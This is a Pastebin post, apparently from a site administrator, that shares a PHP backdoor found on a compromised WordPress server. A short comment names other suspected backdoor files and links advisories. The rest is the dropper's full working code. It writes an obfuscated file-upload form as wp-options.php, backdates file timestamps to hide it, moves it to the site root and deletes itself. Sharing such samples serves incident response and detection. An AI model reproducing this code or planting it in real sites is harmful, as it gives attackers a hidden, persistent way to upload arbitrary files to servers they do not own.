Guest User

frommhead.php

a guest
Dec 15th, 2014
487
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /* Found suspicious backdoor that modifies wp-options.php in wp-admin directory, moves it to WordPress root, then removes itself. Placed by an unknown backdoor and sits silently for a request directly to frommhead.php.
  2.  
  3. Possible backdoors may be cmdshell files, maldet found these files in production:
  4. wp-includes/js/thickbox/rvbt28.php
  5. wp-includes/class-wp-xmlrpc.php
  6. wp-content/themes/agentpress/mtgh.php
  7.  
  8. Backdoors may have been placed by one or more vulnerabilities. A couple to note that were found in production but not 100% certain which exploit was used:
  9. http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html
  10. http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html
  11.  
  12. Still seeking possible backdoors that have evaded maldet.
  13. */
  14.  
  15. <?php
  16.  
  17. $DEBUG_MODE=false;
  18.  
  19. // Creating wp-admin/wp-options.php (uploader)
  20.  
  21. $file_data_head ="<?php
  22. if(isset(#_POST['Submit'])){
  23.    #filedir = '';
  24.    #maxfile = '2888888';
  25.  
  26.    #userfile_name = #_FILES['image']['name'];
  27.    #userfile_tmp = #_FILES['image']['tmp_name'];
  28.    if (isset(#_FILES['image']['name'])) {
  29.        #abod = #filedir.#userfile_name;
  30.        @move_uploaded_file(#userfile_tmp, #abod);
  31.  
  32. }
  33. }
  34. else{
  35. echo'<form method=\"POST\" action=\"\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"image\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"></form>';
  36. }
  37. ?>";
  38.  
  39. echo"<br>---------------------------- Create wp-admin/wp-options.php (uploader) ---------------------------------<br><br>";
  40. if (file_put_contents("wp-optionstmp.php", str_replace("#", "$", $file_data_head))) {
  41. touch("wp-optionstmp.php", mktime(12, 17, 11, 12, 31, 2013));
  42.         echo"Proceeded: ".$start."/wp-admin/wp-options.php > Succesfull<br>";
  43. } else {
  44.         echo"Proceeded: ".$start."/wp-admin/wp-options.php > Error!<br>";
  45. }
  46.  
  47. $file = 'wp-optionstmp.php';
  48. $newfile = '../wp-options.php';
  49.  
  50. echo"<br>---------------------------- Move wp-admin/wp-options.php > To root folder ---------------------------------<br><br>";
  51. if (rename($file,$newfile)) {
  52. touch("../wp-options.php", mktime(12, 17, 11, 12, 31, 2013));
  53.         echo"Proceeded: ".$start."/wp-options.php > Succesfull<br>";
  54. } else {
  55.         echo"Proceeded: ".$start."/wp-options.php > Error!<br>";
  56. }
  57.  
  58. $file='frommshead.php';
  59.  
  60. echo"<br>---------------------------- Remove frommshead.php (Remove files) ---------------------------------<br><br>";
  61. touch("frommshead.php", mktime(12, 17, 11, 12, 31, 2013));
  62. unlink($file);
RAW Paste Data